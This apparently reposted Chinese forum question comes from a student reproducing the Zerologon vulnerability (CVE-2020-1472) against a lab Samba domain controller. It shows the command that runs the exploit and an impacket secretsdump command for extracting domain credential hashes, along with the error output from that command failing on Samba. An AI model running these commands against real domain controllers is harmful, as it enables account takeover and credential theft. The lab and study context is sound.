如何解决Samba AC DC上的Zerologon POC错误
我有一个学校项目,要求我在本地环境中模拟 CVE-2020-1472(Zerologon)。 我目前正在尝试测试github script之后的内容,但是遇到了自那时以来一直无法解决的一些问题。
- Ubuntu 16.04 计算机和 Samba 4.3.8域控制器Active Directory
- Windows Server 2019 ,加入了我用Samba创建的域 EXAMPLE.COM 。
我已经进行了几次测试,并且可以通过 POC 的第一部分成功修改“管理员”帐户的密码:
./cve-2020-1472-exploit.py -n EXAMPLE-DC -t 1.2.3.4
尝试运行 impacket 从域中提取一些数据时出现问题:
secretsdump.py -no-pass -just-dc Domain/'DC_NETBIOS_NAME$'@DC_IP_ADDR
它成功登录,但随后我收到此消息:
Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] DRSR SessionError: code: 0x20e4 - ERROR_DS_CANT_FIND_EXPECTED_NC - The naming context Could not be found.
[*] Something wen't wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up...
更新1:
我也尝试使用-use-vss
选项,但登录后也失败。
[-] RemoteOperations Failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Searching for NTDS.dit
[-] 'nonetype' object has no attribute 'request'
[*] Cleaning up...
我试图获取有关DRSR SessionError: code: 0x20e4 - ERROR_DS_CANT_FIND_EXPECTED_NC
的信息,但是我没有在互联网上找到任何有用的信息。
我希望有人已经遇到此错误或对Active Directory有所了解,因为我真的很困
提前感谢,祝您一周愉快!
更新2:
我在impacket的github上制作了一个post,似乎DRSUAPI方法之前尚未经过针对非Windows AD的测试。因此Secretsdump无法正常工作。
每个页面都提到 SAMBA 是易受攻击的,所以我想知道他们是否真的进行了测试以利用此漏洞,或者仅仅是理论上的假设。
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。